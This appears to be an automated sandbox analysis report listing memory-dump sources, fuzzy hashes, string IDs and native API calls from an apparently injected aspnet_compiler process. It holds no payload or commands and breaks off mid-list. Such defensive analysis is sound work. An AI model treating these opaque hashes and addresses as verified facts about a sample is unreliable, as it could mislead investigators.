                                                • API String ID:
                                                • Opcode ID: 86db8dd7e4ef09f1f656aaaeee12ef761aaef661e90850e0c2eede39fdb95572
                                                • Instruction ID: fc86dcdcb06152930ffb678d6365f7ee7cf30d8ed30bf16c2a113f96a34d4868
                                                • Opcode Fuzzy Hash: 86db8dd7e4ef09f1f656aaaeee12ef761aaef661e90850e0c2eede39fdb95572
                                                • Instruction Fuzzy Hash: 85F0AE38A01208EFCB45DFA8D944A9DBBF0FB48300F1081A9E918A7320D731AA54DB81
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8c375986d2a2a2bb5d6c756db2d69a484875875326489832b835479d56daffdd
                                                • Instruction ID: d0bc6871b4a1a0e726537fa11fac742a8f9beadb70fc7479012ce5e90e80eaf1
                                                • Opcode Fuzzy Hash: 8c375986d2a2a2bb5d6c756db2d69a484875875326489832b835479d56daffdd
                                                • Instruction Fuzzy Hash: 8DE01274D01308EFCB04DFA8E404A9DBBB5EB48300F1081AAE804A3350D735AA91DF80
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 798c80442093d2001d187f06462a091bf4d5156489912aeb03f14f9cc17c9c72
                                                • Instruction ID: 404cba6483a6752449b874f1963a483fbdaaba3415413cb71ed1e21ddf5575de
                                                • Opcode Fuzzy Hash: 798c80442093d2001d187f06462a091bf4d5156489912aeb03f14f9cc17c9c72
                                                • Instruction Fuzzy Hash: 95E0B670D05308EFCB55DFB8A5156ADBBF4AB89301F2082EAD858A3340D739AB45DB81
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e02a9ab1324a86a9b10d6cfc1aa938215351623b09383f2a63d8418e09e03cb
                                                • Instruction ID: 7ed6bfad9799febc6acfe430575265dba96ee91f75bacc0dcd005b34e1345b5f
                                                • Opcode Fuzzy Hash: 4e02a9ab1324a86a9b10d6cfc1aa938215351623b09383f2a63d8418e09e03cb
                                                • Instruction Fuzzy Hash: ECE0B670D01308EFCB54EFA8E55569DBBF4EB48300F5081A9D818A3340D735AA45CF81
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 744505a7ebb0be5a08dee2789d153cd63d8b40b7ca64ad4c414791d2920d66e7
                                                • Instruction ID: de787550fb9f6f1d4198e4be811e1aefaf24c23148b547d19f30552ceefc7ebd
                                                • Opcode Fuzzy Hash: 744505a7ebb0be5a08dee2789d153cd63d8b40b7ca64ad4c414791d2920d66e7
                                                • Instruction Fuzzy Hash: 74E0B674901248DFC740DFA8E555A5DBBF4AB09301F5001A9D90497360E730AA44CB81
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: edc251e503253d9fa58f01319964ac7eb8c6cb84e562d0dcedb0ffed6f25c61d
                                                • Instruction ID: 6ceb2a3d4f0679a71e90b6f536c2d7f02ca95c5cf725bfd4c99413dbbd647e8f
                                                • Opcode Fuzzy Hash: edc251e503253d9fa58f01319964ac7eb8c6cb84e562d0dcedb0ffed6f25c61d
                                                • Instruction Fuzzy Hash: 4ED05E7090120DEFDB04EFA5E911B5EB3F8AB48300F5000A89809B3340DB319F44DBA1
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe9f3ce2d0c692f1e5d3765543a1dde4492f92bc662a87e156100039bb3779f3
                                                • Instruction ID: 76e5a0edb038983a0e9164a43236d45336b65a141004ab196dc27879b279f7e6
                                                • Opcode Fuzzy Hash: fe9f3ce2d0c692f1e5d3765543a1dde4492f92bc662a87e156100039bb3779f3
                                                • Instruction Fuzzy Hash: 55D01735901208EFC700EBE4E915B9DB3E8EB09200F1144A8A404A3240DB31AF549BA9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p!p
                                                • API String ID: 0-1147775804
                                                • Opcode ID: bb37e3362a655e3a1e5d1f5627fec3dfd3a4d14edaac710641f053e0e0ad3070
                                                • Instruction ID: 786fa29abadd0cd8cb8a63804e116e8f1678bdde49a38e6fd07b2a4c1686c623
                                                • Opcode Fuzzy Hash: bb37e3362a655e3a1e5d1f5627fec3dfd3a4d14edaac710641f053e0e0ad3070
                                                • Instruction Fuzzy Hash: 73320175A00218DFDB55DFA8C884F99BBB2FF49300F1580E9E509AB261DB31AE95DF10
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e03275cf1c6c724f3e3320549c2fd9ab6d88195c4c2a5a326180131df289dfb
                                                • Instruction ID: 5cccb66a1d3025fb034994a27c1f15bb838f03bc86b66db29c52d4de711639d6
                                                • Opcode Fuzzy Hash: 2e03275cf1c6c724f3e3320549c2fd9ab6d88195c4c2a5a326180131df289dfb
                                                • Instruction Fuzzy Hash: 9951E975E052188FDB15DFAAD940ADDBBF2BF89300F14C1AAD409AB265EB305A45DF10

                                                Execution Graph

                                                Execution Coverage:1.1%
                                                Dynamic/Decrypted Code Coverage:4.4%
                                                Signature Coverage:7%
                                                Total number of Nodes:114
                                                Total number of Limit Nodes:11
                                                • Rendered graph omitted; the node dump lists calls to LdrInitializeThunk, NtClose, RtlAllocateHeap, RtlFreeHeap and ExitProcess

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 34 42bda3-42bddc call 404593 call 42cf73 NtClose
                                                APIs
                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BDD7
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                • Instruction ID: d90ea754d99db2d9abd4fcdc73495245e7fae96ad713b828660b781994584198
                                                • Opcode Fuzzy Hash: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                • Instruction Fuzzy Hash: CDE04F712403147BC610AA5AEC41F9B776CDBC5714F004069FA0C67181C7B5BA1487F4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 48 9107ac-9107c1 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 44 90f9f0-90fa05 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 45 90fae8-90fafd LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 46 90fb68-90fb7d LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 47 90fdc0-90fdd5 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 29 42c0e3-42c121 call 404593 call 42cf73 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,55CCCCC3,00000007,00000000,00000004,00000000,004168EC,000000F4), ref: 0042C11C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                • Instruction ID: d601fce2e6cfc47c523398d08e96a68e9c79fc9ca5f02ac62e6cc3558dbc2de4
                                                • Opcode Fuzzy Hash: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                • Instruction Fuzzy Hash: D4E0EDB2244214BBD614EF99DC41F9B77ADDFC9714F004459FA08A7281D674BD14CAB8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 24 42c0a3-42c0e1 call 404593 call 42cf73 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,0041DE11,?,?,00000000,?,0041DE11,?,?,?), ref: 0042C0DC
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                • Instruction ID: e057fd75638c54c2a83d139f9191c8a4f81c752b1f28dea9c101fe2514506ad0
                                                • Opcode Fuzzy Hash: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                • Instruction Fuzzy Hash: 68E06DB1204204BBDA14EE99EC41FAB37ACEFC9714F104019FA08A7281C674BD1487F8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 39 42c123-42c15c call 404593 call 42cf73 ExitProcess
                                                APIs
                                                • ExitProcess.KERNELBASE(?), ref: 0042C157
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                • Instruction ID: 5b3de0624fe0a28c818fb70999a8e3532c71153bdfbe5aac28f931c41c5855af
                                                • Opcode Fuzzy Hash: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                • Instruction Fuzzy Hash: 10E086352402147BC610EB5ADC41F9B776CDFC5714F108419FA0CA7181C671BA1487F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: [Pj
                                                • API String ID: 0-2289356113
                                                • Opcode ID: 9a99eee722023492aff25a212910d8b9868680de85b5fbd83f705756b8935ef3
                                                • Instruction ID: 11bf0445707fbfb42ac792eb21369a4135df474638ff2232701c1730a228b40c
                                                • Opcode Fuzzy Hash: 9a99eee722023492aff25a212910d8b9868680de85b5fbd83f705756b8935ef3
                                                • Instruction Fuzzy Hash: FDF06D31208244AFEB22DB10CC85F2A7BB9AFC5754F14C819F8456A0D3C7668821E721
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                • Instruction ID: 97194e964baab974b63f2182347e793807f5b60ad3d47569104d946c8401b4b0
                                                • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                • Instruction Fuzzy Hash: D6F0AF2132C169ABDB58EF18A99177A339DEB94300F54C439E949CB249D625AD408290
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                • Instruction ID: feba373b7be43877dfa0b3e7321802ede6b63047e498ddc52f276ab28f72fd25
                                                • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                • Instruction Fuzzy Hash: 4CF082722442099FCB1CCF04C4D0BBA37B6ABC1719F25442CE50B8F690D7399881DA54
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 103616ab1e1361e5600627e557f05b3b552ec714c48f2a94b05d8f106d6a590a
                                                • Instruction ID: 0522b170cd82fc089b6eab8e0131f179bb6de3973d39b58ca5f2cb94a12941fd
                                                • Opcode Fuzzy Hash: 103616ab1e1361e5600627e557f05b3b552ec714c48f2a94b05d8f106d6a590a
                                                • Instruction Fuzzy Hash: 51E0E5B2549B81CFD321DF149901B1AB3E4FB88B10F15483AE80A97A90D7689A09CA52
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
